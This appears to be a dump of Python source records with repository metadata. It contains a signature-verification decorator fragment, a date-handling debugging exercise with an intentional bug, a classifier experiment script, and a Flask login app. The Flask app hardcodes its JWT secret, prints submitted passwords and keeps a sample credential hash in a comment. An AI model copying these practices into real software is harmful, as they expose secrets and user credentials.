@wraps(f)
def wrapper(*args, **kwargs):
# Verify request
signature = request.headers.get("X-Signature-Ed25519")
timestamp = request.headers.get("X-Signature-Timestamp")
if (
signature is None
or timestamp is None
or not verify_key(request.data, signature, timestamp, client_public_key)
):
return "Bad request signature", 401
# Automatically respond to pings
if request.json and request.json.get("type") == InteractionType.PING:
return jsonify({"type": InteractionCallbackType.PONG})
# Pass through
return f(*args, **kwargs)
return wrapper
return _decorator
| 824
| 0
| 23
|
a2d3c862606cac3220edb171c369ca9b33ceab18
| 1,856
|
py
|
Python
|
practice/troubleshooting/compare_problem.py
|
jhabboubi/GoogleAutomation
|
eb2c79f5ff5e5d600de83f406f24e6d79e0d8fda
|
[
"MIT"
] | null | null | null |
practice/troubleshooting/compare_problem.py
|
jhabboubi/GoogleAutomation
|
eb2c79f5ff5e5d600de83f406f24e6d79e0d8fda
|
[
"MIT"
] | null | null | null |
practice/troubleshooting/compare_problem.py
|
jhabboubi/GoogleAutomation
|
eb2c79f5ff5e5d600de83f406f24e6d79e0d8fda
|
[
"MIT"
] | null | null | null |
"""
The datetime module supplies classes for manipulating dates and times, and contains many types, objects, and methods.
You've seen some of them used in the dow function, which returns the day of the week for a specific date. We'll use them
again in the next_date function, which takes the date_string parameter in the format of "year-month-day", and uses the add_year function
to calculate the next year that this date will occur (it's 4 years later for the 29th of February during Leap Year, and 1 year later for all other dates).
Then it returns the value in the same format as it receives the date: "year-month-day".
Can you find the error in the code? Is it in the next_date function or the add_year function?
How can you determine if the add_year function returns what it's supposed to? Add debug lines as necessary
to find the problems, then fix the code to work as indicated above.
"""
import datetime
from datetime import date
today = date.today() # Get today's date
print(next_date(str(today)))
# Should return a year from today, unless today is Leap Day
print(next_date("2021-01-01")) # Should return 2022-01-01
print(next_date("2020-02-29")) # Should return 2024-02-29
| 45.268293
| 154
| 0.755927
|
"""
The datetime module supplies classes for manipulating dates and times, and contains many types, objects, and methods.
You've seen some of them used in the dow function, which returns the day of the week for a specific date. We'll use them
again in the next_date function, which takes the date_string parameter in the format of "year-month-day", and uses the add_year function
to calculate the next year that this date will occur (it's 4 years later for the 29th of February during Leap Year, and 1 year later for all other dates).
Then it returns the value in the same format as it receives the date: "year-month-day".
Can you find the error in the code? Is it in the next_date function or the add_year function?
How can you determine if the add_year function returns what it's supposed to? Add debug lines as necessary
to find the problems, then fix the code to work as indicated above.
"""
import datetime
from datetime import date
def add_year(date_obj):
try:
new_date_obj = date_obj.replace(year = date_obj.year + 1)
except ValueError:
# This gets executed when the above method fails,
# which means that we're making a Leap Year calculation
new_date_obj = date_obj.replace(year = date_obj.year + 4)
return new_date_obj
def next_date(date_string):
# Convert the argument from string to date object
date_obj = datetime.datetime.strptime(date_string, r"%Y-%m-%d")
next_date_obj = add_year(date_obj)
# Convert the datetime object to string,
# in the format of "yyyy-mm-dd"
next_date_string = next_date_obj.strftime("yyyy-mm-dd")
return next_date_string
today = date.today() # Get today's date
print(next_date(str(today)))
# Should return a year from today, unless today is Leap Day
print(next_date("2021-01-01")) # Should return 2022-01-01
print(next_date("2020-02-29")) # Should return 2024-02-29
| 615
| 0
| 46
|
1a36054e4b7418274e99314f78d19465e2792514
| 18,963
|
py
|
Python
|
pairwise_classification/one_part_exp.py
|
dreamysx/lorelei
|
e17b13309ab57920690c843b92eab0178190ec20
|
[
"MIT"
] | null | null | null |
pairwise_classification/one_part_exp.py
|
dreamysx/lorelei
|
e17b13309ab57920690c843b92eab0178190ec20
|
[
"MIT"
] | null | null | null |
pairwise_classification/one_part_exp.py
|
dreamysx/lorelei
|
e17b13309ab57920690c843b92eab0178190ec20
|
[
"MIT"
] | null | null | null |
from __future__ import division
import json
import numpy as np
import matplotlib.pyplot as plt
import time
import random
from sklearn.linear_model import LogisticRegressionCV
from sklearn.ensemble import RandomForestClassifier as RFC
import pandas as pd
import operator
from sklearn.metrics import roc_curve, precision_recall_curve, precision_recall_fscore_support
print 'IMPORTANT: experiment can be modified by changing parameter combinations in main function!'
print 'loading data...'
part1_pos_10 = json.loads(open("new_dedup_part1_pos_10.json").read()) # 1552
part1_pos_200 = json.loads(open("new_dedup_part1_pos_200_embed.json").read())
part1_pos_walk_200 = json.loads(open("new_dedup_part1_pos_200_walk.json").read())
part2_pos_10 = json.loads(open("new_dedup_part2_pos_10.json").read()) # 24251
part2_pos_200 = json.loads(open("new_dedup_part2_pos_200_embed.json").read())
part2_pos_walk_200 = json.loads(open("new_dedup_part2_pos_200_walk.json").read())
part3_pos_10 = json.loads(open("new_dedup_part3_pos_10.json").read()) # 1353
part3_pos_200 = json.loads(open("new_dedup_part3_pos_200_embed.json").read())
part3_pos_walk_200 = json.loads(open("new_dedup_part3_pos_200_walk.json").read())
part4_pos_10 = json.loads(open("new_dedup_part4_pos_10.json").read()) # 3399
part4_pos_200 = json.loads(open("new_dedup_part4_pos_200_embed.json").read())
part4_pos_walk_200 = json.loads(open("new_dedup_part4_pos_200_walk.json").read())
part5_pos_10 = json.loads(open("new_dedup_part5_pos_10.json").read()) # 11692
part5_pos_200 = json.loads(open("new_dedup_part5_pos_200_embed.json").read())
part5_pos_walk_200 = json.loads(open("new_dedup_part5_pos_200_walk.json").read())
global_pos_10 = json.loads(open("new_dedup_global_pos_10.json").read()) # 1552
global_pos_200 = json.loads(open("new_dedup_global_pos_200_embed.json").read())
global_pos_walk_200 = json.loads(open("new_dedup_global_pos_200_walk.json").read())
global_neg_10 = json.loads(open("new_dedup_global_neg_10.json").read()) # 1552
global_neg_200 = json.loads(open("new_dedup_global_neg_200_embed.json").read())
global_neg_walk_200 = json.loads(open("new_dedup_global_neg_200_walk.json").read())
# combinations of each partition
# 901
part1_pos_10_walk = combineData(source1_pos=part1_pos_10, source2_pos=part1_pos_walk_200)
part1_pos_10_walk_dv = combineData(source1_pos=part1_pos_10, source3_pos=part1_pos_200, source2_pos=part1_pos_walk_200)
# 12294
part2_pos_10_walk = combineData(source1_pos=part2_pos_10, source2_pos=part2_pos_walk_200)
part2_pos_10_walk_dv = combineData(source1_pos=part2_pos_10, source3_pos=part2_pos_200, source2_pos=part2_pos_walk_200)
# 895
part3_pos_10_walk = combineData(source1_pos=part3_pos_10, source2_pos=part3_pos_walk_200)
part3_pos_10_walk_dv = combineData(source1_pos=part3_pos_10, source3_pos=part3_pos_200, source2_pos=part3_pos_walk_200)
# 1992
part4_pos_10_walk = combineData(source1_pos=part4_pos_10, source2_pos=part4_pos_walk_200)
part4_pos_10_walk_dv = combineData(source1_pos=part4_pos_10, source3_pos=part4_pos_200, source2_pos=part4_pos_walk_200)
# 5952
part5_pos_10_walk = combineData(source1_pos=part5_pos_10, source2_pos=part5_pos_walk_200)
part5_pos_10_walk_dv = combineData(source1_pos=part5_pos_10, source3_pos=part5_pos_200, source2_pos=part5_pos_walk_200)
(combPos_10_walk, combNeg_10_walk) = combineData(source1_pos=global_pos_10,
source1_neg=global_neg_10,
source2_pos=global_pos_walk_200,
source2_neg=global_neg_walk_200,
source3_pos=None,
source3_neg=None)
(combPos_10_walk_dv, combNeg_10_walk_dv) = combineData(source1_pos=global_pos_10,
source1_neg=global_neg_10,
source2_pos=global_pos_walk_200,
source2_neg=global_neg_walk_200,
source3_pos=global_pos_200,
source3_neg=global_neg_200)
# functions
# general function for taking samples from a list
print 'defining function...'
# averaging the results from trials
# input should be lists of 10 or 210 dimensions
# trialsWithVariedTrainSize
if __name__ == "__main__":
# experiment execution
print "start training..."
print 'part1 vs others classifer...'
# 10_walk_dv
print "train part1 test other parts with 10_walk_dv..."
(part1_10_walk_dv, generalResultsPosNumRef) = trialsWithVariedTrainSize(num_pos_sample=901,
num_pos_sample_cap=901,
neg_pos_ratio=1,
pos_training_dataset=part1_pos_10_walk_dv,
pos_testing_dataset=part2_pos_10_walk_dv + part3_pos_10_walk_dv + part4_pos_10_walk_dv + part5_pos_10_walk_dv,
neg_dataset=combNeg_10_walk_dv,
train_test_split=0,
test_stratify=True,
scoring="f1",
plt_or_not=False,
save=False)
targ = part1_10_walk_dv
max_f1 = max(targ[0][3]) # 0.5885
index_max_f1 = targ[0][3].index(max(targ[0][3])) # 73
prec_at_max_f1 = targ[0][1][index_max_f1] # 0.5536
rec_at_max_f1 = targ[0][2][index_max_f1] # 0.6204
print "index: %d, f1: %f, prec: %f, rec: %f" % (
index_max_f1, round(max_f1, 4), round(prec_at_max_f1, 4), round(rec_at_max_f1, 4))
print 'done!'
| 43.393593
| 186
| 0.590729
|
from __future__ import division
import json
import numpy as np
import matplotlib.pyplot as plt
import time
import random
from sklearn.linear_model import LogisticRegressionCV
from sklearn.ensemble import RandomForestClassifier as RFC
import pandas as pd
import operator
from sklearn.metrics import roc_curve, precision_recall_curve, precision_recall_fscore_support
print 'IMPORTANT: experiment can be modified by changing parameter combinations in main function!'
print 'loading data...'
part1_pos_10 = json.loads(open("new_dedup_part1_pos_10.json").read()) # 1552
part1_pos_200 = json.loads(open("new_dedup_part1_pos_200_embed.json").read())
part1_pos_walk_200 = json.loads(open("new_dedup_part1_pos_200_walk.json").read())
part2_pos_10 = json.loads(open("new_dedup_part2_pos_10.json").read()) # 24251
part2_pos_200 = json.loads(open("new_dedup_part2_pos_200_embed.json").read())
part2_pos_walk_200 = json.loads(open("new_dedup_part2_pos_200_walk.json").read())
part3_pos_10 = json.loads(open("new_dedup_part3_pos_10.json").read()) # 1353
part3_pos_200 = json.loads(open("new_dedup_part3_pos_200_embed.json").read())
part3_pos_walk_200 = json.loads(open("new_dedup_part3_pos_200_walk.json").read())
part4_pos_10 = json.loads(open("new_dedup_part4_pos_10.json").read()) # 3399
part4_pos_200 = json.loads(open("new_dedup_part4_pos_200_embed.json").read())
part4_pos_walk_200 = json.loads(open("new_dedup_part4_pos_200_walk.json").read())
part5_pos_10 = json.loads(open("new_dedup_part5_pos_10.json").read()) # 11692
part5_pos_200 = json.loads(open("new_dedup_part5_pos_200_embed.json").read())
part5_pos_walk_200 = json.loads(open("new_dedup_part5_pos_200_walk.json").read())
global_pos_10 = json.loads(open("new_dedup_global_pos_10.json").read()) # 1552
global_pos_200 = json.loads(open("new_dedup_global_pos_200_embed.json").read())
global_pos_walk_200 = json.loads(open("new_dedup_global_pos_200_walk.json").read())
global_neg_10 = json.loads(open("new_dedup_global_neg_10.json").read()) # 1552
global_neg_200 = json.loads(open("new_dedup_global_neg_200_embed.json").read())
global_neg_walk_200 = json.loads(open("new_dedup_global_neg_200_walk.json").read())
def combineData(source1_pos=None,
source1_neg=None,
source2_pos=None,
source2_neg=None,
source3_pos=None,
source3_neg=None):
# assert (len(source1_pos) == len(source2_pos) == len(source3_pos)), "pos should be equal length"
# assert (len(source1_neg) == len(source2_neg) == len(source3_neg)), "neg should be equal length"
comb_pos = []
comb_neg = []
if source3_pos == None: # only combine two datasets
for i in range(len(source1_pos)):
comb_pos.append(source1_pos[i] + source2_pos[i])
if source1_neg != None:
for i in range(len(source1_neg)):
comb_neg.append(source1_neg[i] + source2_neg[i])
else:
for i in range(len(source1_pos)):
comb_pos.append(source1_pos[i] + source2_pos[i] + source3_pos[i])
if source1_neg != None:
for i in range(len(source1_neg)):
comb_neg.append(source1_neg[i] + source2_neg[i] + source3_neg[i])
if len(comb_neg) == 0:
return comb_pos
else:
return (comb_pos, comb_neg)
# combinations of each partition
# 901
part1_pos_10_walk = combineData(source1_pos=part1_pos_10, source2_pos=part1_pos_walk_200)
part1_pos_10_walk_dv = combineData(source1_pos=part1_pos_10, source3_pos=part1_pos_200, source2_pos=part1_pos_walk_200)
# 12294
part2_pos_10_walk = combineData(source1_pos=part2_pos_10, source2_pos=part2_pos_walk_200)
part2_pos_10_walk_dv = combineData(source1_pos=part2_pos_10, source3_pos=part2_pos_200, source2_pos=part2_pos_walk_200)
# 895
part3_pos_10_walk = combineData(source1_pos=part3_pos_10, source2_pos=part3_pos_walk_200)
part3_pos_10_walk_dv = combineData(source1_pos=part3_pos_10, source3_pos=part3_pos_200, source2_pos=part3_pos_walk_200)
# 1992
part4_pos_10_walk = combineData(source1_pos=part4_pos_10, source2_pos=part4_pos_walk_200)
part4_pos_10_walk_dv = combineData(source1_pos=part4_pos_10, source3_pos=part4_pos_200, source2_pos=part4_pos_walk_200)
# 5952
part5_pos_10_walk = combineData(source1_pos=part5_pos_10, source2_pos=part5_pos_walk_200)
part5_pos_10_walk_dv = combineData(source1_pos=part5_pos_10, source3_pos=part5_pos_200, source2_pos=part5_pos_walk_200)
(combPos_10_walk, combNeg_10_walk) = combineData(source1_pos=global_pos_10,
source1_neg=global_neg_10,
source2_pos=global_pos_walk_200,
source2_neg=global_neg_walk_200,
source3_pos=None,
source3_neg=None)
(combPos_10_walk_dv, combNeg_10_walk_dv) = combineData(source1_pos=global_pos_10,
source1_neg=global_neg_10,
source2_pos=global_pos_walk_200,
source2_neg=global_neg_walk_200,
source3_pos=global_pos_200,
source3_neg=global_neg_200)
# functions
# general function for taking samples from a list
print 'defining function...'
def takingSamples(alist, num=0, portion=0):
assert ((num > 0 and portion == 0) or (num == 0 and portion > 0)), "should offer only one method, num or portion"
seed = int(round(time.time() * 1000)) % 100000000
random.seed(seed)
length_of_list = len(alist)
listPicked = []
listNotPicked = []
if num > 0:
chosen_ids = set()
while len(chosen_ids) < num:
tmpRandInt = random.randint(0, length_of_list - 1) # cover both head and tail
chosen_ids.add(tmpRandInt)
t_f_list = [False for i in range(length_of_list)]
for i in chosen_ids:
t_f_list[i] = True
for i, j in enumerate(t_f_list):
if j:
listPicked.append(alist[i])
else:
listNotPicked.append(alist[i])
if portion > 0:
num = int(length_of_list * portion)
chosen_ids = set()
while len(chosen_ids) < num:
tmpRandInt = random.randint(0, length_of_list - 1) # cover both head and tail
chosen_ids.add(tmpRandInt)
t_f_list = [False for i in range(length_of_list)]
for i in chosen_ids:
t_f_list[i] = True
for i, j in enumerate(t_f_list):
if j:
listPicked.append(alist[i])
else:
listNotPicked.append(alist[i])
return (listPicked, listNotPicked)
# usage e.g.
# (listPicked, listNotPicked) = takingSamples([1,2,3,4,5,6], num=4)
# (listPicked, listNotPicked) = takingSamples([[1,2],[2,5],[3,7],[4,6],[5,5],[6,1]], num=4)
# print listPicked
# print listNotPicked
# averaging the results from trials
def avgProcess(trialsAns):
trialsAns_np = np.array(trialsAns)
num_trial = len(trialsAns_np) # 10
# place holder for average threshold, precision, recall, f1
avg_thres = np.array([0.0 for i in range(len(trialsAns_np[0]))])
avg_prec = np.array([0.0 for i in range(len(trialsAns_np[0]))])
avg_rec = np.array([0.0 for i in range(len(trialsAns_np[0]))])
avg_f1 = np.array([0.0 for i in range(len(trialsAns_np[0]))])
for i in range(num_trial):
tmp = np.array(trialsAns_np[i])
avg_thres += tmp[:, 0] # the 0th column
avg_prec += tmp[:, 1]
avg_rec += tmp[:, 2]
avg_f1 += tmp[:, 3]
avg_thres = avg_thres / float(num_trial)
avg_prec = avg_prec / float(num_trial)
avg_rec = avg_rec / float(num_trial)
avg_f1 = avg_f1 / float(num_trial)
avg_thres = list(avg_thres)
avg_prec = list(avg_prec)
avg_rec = list(avg_rec)
avg_f1 = list(avg_f1)
return (avg_thres, avg_prec, avg_rec, avg_f1)
# input should be lists of 10 or 210 dimensions
def oneTrialWithCertainTrainSize(num_pos_sample=50,
neg_pos_ratio=1,
pos_training_dataset=None,
pos_testing_dataset=None,
neg_dataset=None,
train_test_split=0,
# obselete feature, keep default parameter to bypass, feature achieved by "num_pos_sample" param
test_stratify=True,
# obselete feature, keep default parameter to bypass, feature achieved by "num_pos_sample" param
scoring="f1",
plt_or_not=True):
assert (type(pos_training_dataset) == list and type(neg_dataset) == list), "input datasets should be lists"
num_neg_sample = int(num_pos_sample * neg_pos_ratio)
# take sample of num_pos_sample number of positive examples
(posPicked, posNotPicked) = takingSamples(pos_training_dataset, num=num_pos_sample)
(negPicked, negNotPicked) = takingSamples(neg_dataset, num=num_neg_sample)
# create train_X, train_y
train_X = pd.DataFrame(posPicked + negPicked)
train_y = np.array([1 for i in range(len(posPicked))] + [0 for i in range(len(negPicked))])
# create test_X and test_y
if train_test_split != 0:
testSize = int(
(num_pos_sample + num_neg_sample) / train_test_split * (1 - train_test_split)) # size of test set
if test_stratify:
testPosSize = int(float(testSize) / (neg_pos_ratio + 1))
testNegSize = testSize - testPosSize
test_X = pd.DataFrame(
takingSamples(posNotPicked, num=testPosSize)[0] + takingSamples(negNotPicked, num=testNegSize)[0]) #
test_y = np.array([1 for i in range(testPosSize)] + [0 for i in range(testNegSize)])
else:
for idx in range(len(posNotPicked)):
posNotPicked[idx].append(1)
for idx in range(len(negNotPicked)):
negNotPicked[idx].append(0)
test_X = pd.DataFrame(takingSamples(posNotPicked + negNotPicked, num=testSize)[0])
test_y = np.array()
for i in test_X:
if i[-1] == 1:
test_y.append(1)
else:
test_y.append(0)
for idx in range(len(test_X)):
del test_X[idx][-1]
else:
if (pos_testing_dataset == None):
test_X = pd.DataFrame(posNotPicked + negNotPicked)
test_y = np.array([1 for i in range(len(posNotPicked))] + [0 for i in range(len(negNotPicked))])
else:
test_X = pd.DataFrame(pos_testing_dataset + negNotPicked)
test_y = np.array([1 for i in range(len(pos_testing_dataset))] + [0 for i in range(len(negNotPicked))])
# train and test the model
reg = RFC(n_estimators=100)
# reg = RFC(n_estimators=200, max_features='log2')
# reg = LogisticRegressionCV(scoring=scoring)
LogModel = reg.fit(train_X, train_y)
y_predlog = LogModel.predict_proba(test_X)
y_predlog_1 = y_predlog[:, 1]
prec, rec, thresholds = precision_recall_curve(test_y, y_predlog_1)
if plt_or_not:
plt.plot(rec, prec)
plt.xlabel("Recall")
plt.ylabel("Precision")
plt.title("Rec-Prec Curve of Logistic Regression Trials")
# pred_combine sorted
pred_combine = []
for i in range(len(test_y)):
pred_combine.append((y_predlog_1[i], test_y[i]))
pred_combine = sorted(pred_combine, key=operator.itemgetter(0))
# create an array of 0.1:0.01:0.99
thres_new = []
initial = 0.1
while initial <= 0.99:
thres_new.append(initial)
initial += 0.01
initial = round(initial, 2)
# generate "threshold, prec, rec, f1" list
# test_y is truth, y_predlog_1 is prob of being 1
result = []
item_index = 0
FN_accu = 0
TN_accu = 0
TP_accu = list(test_y).count(1)
FP_accu = list(test_y).count(0)
for i in thres_new: # i is [0.1:0.01:0.99]
if (item_index < len(pred_combine)):
while pred_combine[item_index][0] < i:
if pred_combine[item_index][1] == 1: # this item actually 1, predict as 0
FN_accu += 1
TP_accu -= 1
else: # this item is actually 0, predict as 0, pred_combine[item_index][1] == 0
TN_accu += 1
FP_accu -= 1
item_index += 1
if (item_index == len(pred_combine)): break
# print "th: " + str(i) + ", TP: " + str(TP_accu) + ", FP: " + str(FP_accu) + ", FN: " + str(FN_accu) + ", TN: " + str(TN_accu)
if (TP_accu == 0):
preci = 0
else:
preci = float(TP_accu) / (TP_accu + FP_accu)
if (TP_accu == 0):
recal = 0
else:
recal = float(TP_accu) / (FN_accu + TP_accu)
if (2 * preci * recal == 0):
fone = 0
else:
fone = 2 * preci * recal / (preci + recal)
result.append([i, preci, recal, fone])
return result # 90
# outArr = oneTrialWithCertainTrainSize(num_pos_sample=60, pos_neg_ratio=1, pos_dataset=global_pos_10_40262, neg_dataset=global_neg_10_402620)
# print "finish"
# trialsWithVariedTrainSize
def trialsWithVariedTrainSize(num_pos_sample=50,
num_pos_sample_cap=1500,
neg_pos_ratio=1,
pos_training_dataset=None,
pos_testing_dataset=None,
neg_dataset=None,
train_test_split=0,
# obsolete feature, keep default parameter to bypass, feature achieved by "num_pos_sample" param
test_stratify=True,
# obsolete feature, keep default parameter to bypass, feature achieved by "num_pos_sample" param
scoring="f1",
plt_or_not=True,
num_trial=10,
save=False,
saveName="0"):
generalResults = []
generalResultsPosNumRef = []
generalStdDev = []
while num_pos_sample <= num_pos_sample_cap:
trialsAns = []
# for each num_pos_sample, perform 10 trials
for trialsCount in range(num_trial):
# one single trial
outArr = oneTrialWithCertainTrainSize(num_pos_sample=num_pos_sample, neg_pos_ratio=neg_pos_ratio,
pos_training_dataset=pos_training_dataset,
pos_testing_dataset=pos_testing_dataset, neg_dataset=neg_dataset,
train_test_split=train_test_split, test_stratify=test_stratify,
scoring=scoring, plt_or_not=plt_or_not)
# put outArr together
trialsAns.append(outArr) # outArr = [threshold, prec, rec, f1tmp]
print "trial #" + str(trialsCount + 1) + " finished!"
# with open("trialsAns.json", "w") as f:
# json.dump(trialsAns, f)
print str(num_pos_sample) + " all trials finished!"
# calc std dev of max f1 based on trialsAns
# stdArray = []
# for e in range(len(trialsAns[0])):
# tmpArr = []
# for k in trialsAns:
# tmpArr.append(k[e][3])
# stdArray.append(np.std(np.array(tmpArr)))
#
# stddev = np.average(stdArray)
# generalStdDev.append(stddev)
#
if save == True:
fileName = "rawResults_" + saveName + ".json"
with open(fileName, "w") as f: json.dump(trialsAns, f)
(avg_thres, avg_prec, avg_rec, avg_f1) = avgProcess(trialsAns)
#
generalResults.append([avg_thres, avg_prec, avg_rec, avg_f1])
generalResultsPosNumRef.append(num_pos_sample)
# print results for each trial
targ = generalResults
index = targ[0][3].index(max(targ[0][3]))
for ntrial in range(len(trialsAns)):
fone = trialsAns[ntrial][index][3]
prec = trialsAns[ntrial][index][1]
rec = trialsAns[ntrial][index][2]
print "For trial#" + str(ntrial)
print "f1: %.4f" % fone + ", prec: %.4f" % prec + ", rec: %.4f" % rec
#
print str(num_pos_sample) + " positive finished!"
num_pos_sample += 50
# if num_pos_sample < 200: num_pos_sample += 10
# elif num_pos_sample < 500: num_pos_sample += 50
# else: num_pos_sample += 100
# return (generalResults, generalStdDev, generalResultsPosNumRef)
return (generalResults, generalResultsPosNumRef)
# return None
if __name__ == "__main__":
# experiment execution
print "start training..."
print 'part1 vs others classifer...'
# 10_walk_dv
print "train part1 test other parts with 10_walk_dv..."
(part1_10_walk_dv, generalResultsPosNumRef) = trialsWithVariedTrainSize(num_pos_sample=901,
num_pos_sample_cap=901,
neg_pos_ratio=1,
pos_training_dataset=part1_pos_10_walk_dv,
pos_testing_dataset=part2_pos_10_walk_dv + part3_pos_10_walk_dv + part4_pos_10_walk_dv + part5_pos_10_walk_dv,
neg_dataset=combNeg_10_walk_dv,
train_test_split=0,
test_stratify=True,
scoring="f1",
plt_or_not=False,
save=False)
targ = part1_10_walk_dv
max_f1 = max(targ[0][3]) # 0.5885
index_max_f1 = targ[0][3].index(max(targ[0][3])) # 73
prec_at_max_f1 = targ[0][1][index_max_f1] # 0.5536
rec_at_max_f1 = targ[0][2][index_max_f1] # 0.6204
print "index: %d, f1: %f, prec: %f, rec: %f" % (
index_max_f1, round(max_f1, 4), round(prec_at_max_f1, 4), round(rec_at_max_f1, 4))
print 'done!'
| 12,621
| 0
| 112
|
38652c248a4584e2b2780ee78dd51e86e74e2328
| 7,639
|
py
|
Python
|
project/projectapp.py
|
psglinux/cmpe-272
|
881d29186930475c88da8b2a4bc9120fea02ee13
|
[
"MIT"
] | 2
|
2019-04-20T03:45:51.000Z
|
2019-04-27T05:52:10.000Z
|
project/projectapp.py
|
psglinux/cmpe-272
|
881d29186930475c88da8b2a4bc9120fea02ee13
|
[
"MIT"
] | 3
|
2019-04-21T18:57:32.000Z
|
2019-04-28T15:14:02.000Z
|
project/projectapp.py
|
psglinux/cmpe-272
|
881d29186930475c88da8b2a4bc9120fea02ee13
|
[
"MIT"
] | 4
|
2019-04-23T00:32:21.000Z
|
2019-04-29T22:29:00.000Z
|
# app.py
import pprint
import json
import bson
import jwt
import pymongo
import mongomock
import requests
from flask import Flask
from flask import jsonify
from flask import request
from flask import Response
from flask import abort
from flask import json,jsonify, make_response,session
from flask import render_template,request,redirect,url_for
from apymongodb import APymongodb
import reviewapi
import query
SECRET_KEY = "Secret Key"
#app = Flask(__name__)
#app.config.from_object(__name__)
# create flask instance
app=create_app()
app = Flask(__name__)
app.config.from_object(__name__)
mongodb_uri="project-mongodb"
login_uri="porject-login-flask"
endpoint_access = {'N': ['login'],
'S': ['login']}
def mock_project_mongo_db():
"""
create a mock db for usint testing.
"""
mock_pymondb = APymongodb(test=True)
mock_pymondb.create_db_from_csv()
mock_pymondb.create_auth_db()
return mock_pymondb.db
@app.route('/',methods=['GET'])
def hello_world():
"""
default route for the Team Elf's home page
"""
return '<h1 align=center>Hello, Welcome to the Project webserver of team ELFs</h1>'
@app.route('/maps',methods=['GET'])
def maps():
"""
default route for the Team Elf's home page
"""
return render_template('maps.html',response=request.response)
@app.route('/login', methods=['POST','GET'])
def app_login():
"""
the route for login. This will talk to a standalone app which is running in
the container login-flask:5000
"""
error=None
if app.testing:
return bson.json_util.dumps({'status': 'success'})
else:
print("received requests")
if request.method == 'POST':
try:
#print("request data from browser:", request.data)
#print("request data from browser:", json.loads(request.data))
#rcv_login_req = json.loads(request.data)
#print("request json from browser:", rcv_login_req)
email_addr=request.form['username']
password=request.form['password']
print(email_addr, ",", password)
rcv_login_req={'email_address':email_addr, 'password':password}
# request the login-app to authenticate the user
#pdata1 = {'email_address':'95f7vcnewd8@iffymedia.com', 'password':'5f4dcc3b5aa765d61d8327deb882cf99'}
headers = {'content-type': 'application/json'}
r = requests.post('http://project-login-flask:5000/login', data=bson.json_util.dumps(rcv_login_req), headers=headers)
#print("send request", dir(r))
#r = requests.get('http://login-flask:5000/')
#print("response:", dir(r))
print("response.text:", r.text)
print("response.status_code", r.status_code)
#print("response.json", r.json)
# TODO: Return the JWT here
session['Authorization']=json.loads(r.text)['auth_token']
#return redirect(url_for('order_books'))
#return render_template('login_success.html', error=error)
return '<h1>'+"Success"+'</h1>'
except Exception as e:
print("exception:", str(e))
#return '<h1>'+"error"+'</h1>'
return render_template('login.html', error=error)
@app.route('/review/<string:listing_id>', methods=['GET'])
@app.route('/loginsuccess', methods=['GET'])
# Test using -> curl -X POST -H 'Content-Type: application/json' http://127.0.0.1/getlistings -d '{"bedrooms":"5.0"}'
# See https://gist.github.com/subfuzion/08c5d85437d5d4f00e58
# Run project/run_proj.sh
#http://ec2-18-191-206-216.us-east-2.compute.amazonaws.com/getlistings?zipcode=3018&bedrooms=1&accomodates=0
@app.route('/getlistings', methods=['GET'])
if __name__ == '__main__':
# app = Flask(__name__)
app.run(host='127.0.0.1',port=5000,debug=True)
| 32.785408
| 129
| 0.615002
|
# app.py
import pprint
import json
import bson
import jwt
import pymongo
import mongomock
import requests
from flask import Flask
from flask import jsonify
from flask import request
from flask import Response
from flask import abort
from flask import json,jsonify, make_response,session
from flask import render_template,request,redirect,url_for
from apymongodb import APymongodb
import reviewapi
import query
SECRET_KEY = "Secret Key"
#app = Flask(__name__)
#app.config.from_object(__name__)
# create flask instance
def create_app():
app=Flask(__name__)
return app
app=create_app()
app = Flask(__name__)
app.config.from_object(__name__)
mongodb_uri="project-mongodb"
login_uri="porject-login-flask"
endpoint_access = {'N': ['login'],
'S': ['login']}
def check_endpoint_access(db, email, ep):
l_data = db.authentication.find_one({'email_address': email})
if l_data :
if ep in endpoint_access[l_data['role']]:
return True
return False
def mock_project_mongo_db():
"""
create a mock db for usint testing.
"""
mock_pymondb = APymongodb(test=True)
mock_pymondb.create_db_from_csv()
mock_pymondb.create_auth_db()
return mock_pymondb.db
def real_mongo_db():
print(mongodb_uri)
return pymongo.MongoClient(mongodb_uri)['client_database']
def get_db_instance():
print("Inside get db instance")
print(app.testing)
if app.testing:
db = mock_project_mongo_db()
else:
db = real_mongo_db()
return db
def check_auth_token(request,db, ep=None):
if 'Authorization' in session.keys():
print(session.keys())
auth_token=session['Authorization']
else:
auth_token=""
if auth_token:
try:
payload = jwt.decode(auth_token,
SECRET_KEY,
algorithm="HS256")
db = get_db_instance()
l_data = db.authentication.find_one({'email_address': payload['sub']})
if l_data:
if ep is not None:
if not check_endpoint_access(db, payload['sub'], ep):
return 'error'
return 'success'
else:
return 'error'
except jwt.ExpiredSignatureError:
return 'Signature expired. Please log in again.'
except jwt.InvalidTokenError:
return 'Invalid token. Please log in again.'
else:
return 'error: no jwt token provided'
@app.route('/',methods=['GET'])
def hello_world():
"""
default route for the Team Elf's home page
"""
return '<h1 align=center>Hello, Welcome to the Project webserver of team ELFs</h1>'
@app.route('/maps',methods=['GET'])
def maps():
"""
default route for the Team Elf's home page
"""
return render_template('maps.html',response=request.response)
@app.route('/login', methods=['POST','GET'])
def app_login():
    """
    Login route: proxies submitted credentials to the standalone login
    service in the ``project-login-flask`` container (port 5000) and, on
    success, stores the returned JWT in the session under 'Authorization'.
    In testing mode a canned success payload is returned instead.
    """
    error=None
    if app.testing:
        return bson.json_util.dumps({'status': 'success'})
    else:
        print("received requests")
        if request.method == 'POST':
            try:
                #print("request data from browser:", request.data)
                #print("request data from browser:", json.loads(request.data))
                #rcv_login_req = json.loads(request.data)
                #print("request json from browser:", rcv_login_req)
                email_addr=request.form['username']
                password=request.form['password']
                # NOTE(review): printing the raw password leaks credentials
                # into logs — remove before production.
                print(email_addr, ",", password)
                rcv_login_req={'email_address':email_addr, 'password':password}
                # request the login-app to authenticate the user
                #pdata1 = {'email_address':'95f7vcnewd8@iffymedia.com', 'password':'5f4dcc3b5aa765d61d8327deb882cf99'}
                headers = {'content-type': 'application/json'}
                r = requests.post('http://project-login-flask:5000/login', data=bson.json_util.dumps(rcv_login_req), headers=headers)
                #print("send request", dir(r))
                #r = requests.get('http://login-flask:5000/')
                #print("response:", dir(r))
                print("response.text:", r.text)
                print("response.status_code", r.status_code)
                #print("response.json", r.json)
                # TODO: Return the JWT here
                session['Authorization']=json.loads(r.text)['auth_token']
                #return redirect(url_for('order_books'))
                #return render_template('login_success.html', error=error)
                return '<h1>'+"Success"+'</h1>'
            except Exception as e:
                # Broad catch: any failure (network, JSON decode, missing
                # 'auth_token' key) falls through to the login form below.
                print("exception:", str(e))
                #return '<h1>'+"error"+'</h1>'
